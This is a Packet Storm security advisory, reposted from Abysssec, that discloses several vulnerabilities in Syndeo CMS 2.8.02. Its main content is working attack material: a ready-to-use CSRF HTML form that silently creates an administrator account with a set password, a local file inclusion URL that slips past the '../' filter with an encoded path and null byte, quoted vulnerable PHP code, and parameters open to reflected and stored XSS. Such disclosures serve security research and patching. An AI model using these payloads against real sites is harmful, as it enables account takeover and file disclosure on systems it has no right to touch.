Month Of Abysssec Undisclosed Bugs - Syndeo CMS 2.8.02

2010-09-06T00:00:00
ID PACKETSTORM:93509
Type packetstorm
Reporter Abysssec
Modified 2010-09-06T00:00:00

Description

                                        
                                            `'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ < Day 4 (0day)  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
'''  
  
Title : syndeocms 2.8.02 Multiple Vulnerabilities  
Affected Version : syndeocms <= 2.8.02  
Vendor Site : http://www.syndeocms.org/  
  
Discovery : abysssec.com  
  
  
Description :  
  
This CMS have many critical vulnerability that we refere to some of those here:  
  
  
Vulnerabilites :  
  
1. CSRF - Add Admin Account:  
  
<html>  
<body>  
<form onsubmit="return checkinput(this);" action="index.php?option=configuration&suboption=users&modoption=save_user&user_id=0" name="form" method="POST">  
<input class="textfield" type="hidden" name="fullname" value="csrf"/>  
<input class="textfield" type="hidden" name="username" value="csrf_admin"/>  
<input class="textfield" type="hidden" name="password" value="admin123"/>  
<input class="textfield" type="hidden" name="email" value="csrf@admin.com"/>  
<select name="editor">  
<option value="1" selected="">FCKEditor</option>  
<option value="2">Plain text Editor</option>  
</select>  
<input type="checkbox" checked="" name="initial" value="1"/>  
<input class="textfield" type="hidden" value="" name="sections"/>  
<input type="radio" name="access_1" value="1"/>  
<input type="radio" name="access_2" value="1"/>  
.  
.  
.  
<input type="radio" name="access_15" value="1"/>  
<input type="radio" name="m_access[0]" value="1"/>  
.  
.  
.  
<input type="radio" name="m_access[21]" value="1"/>  
<input class="savebutton" type="submit" name="savebutton" value=" Save"/>  
</form>  
</body>  
</html>  
-------------------------------------  
2. LFI (Local File Inclusion):  
  
http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00  
  
in starnet\core\con_configuration.inc.php file, As you may noticed theme parameter is checked for "../" and could be bypass by with "..%2F":  
line 61-73:  
switch ($modoption) // start of switch  
{  
case save_css :  
  
if (IsSet ($_POST['content']))  
{  
$content = $_POST['content'];  
}  
  
if (strpos($theme, "../") === FALSE) //check if someone is trying to fool us.  
{  
$filename = "themes/$theme/style.css";  
-------------------------------------  
3. xss:  
in starnet\core\con_alerts.inc.php file "email" parameter when "modoption" is "save_alert":  
http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2  
  
4. stored xss:  
in starnet\core\con_alerts.inc.php file "name" parameter when "modoption" is "save_alert":  
http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert  
------------------------------  
  
`